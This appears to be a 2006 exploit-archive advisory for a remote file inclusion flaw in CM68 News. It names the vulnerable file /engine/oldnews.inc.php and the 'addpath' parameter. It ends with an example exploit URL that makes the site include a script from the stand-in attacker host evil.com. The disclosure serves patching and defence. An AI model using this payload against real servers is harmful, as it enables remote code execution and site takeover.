CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
# Published : 2006-12-08
# Author : Paul Bakoyiannis
# Previous Title : Tucows Client Code Suite (CSS) <= 1.2.1015 File Include Vulnerability
# Next Title : ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability

Vulnerable Software:cm68news
Vulnerable file: /engine/oldnews.inc.php
Credits: Paul Bakoyiannis
Vulnerable Variable: addpath
Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?&

# www.Syue.com [2006-12-08]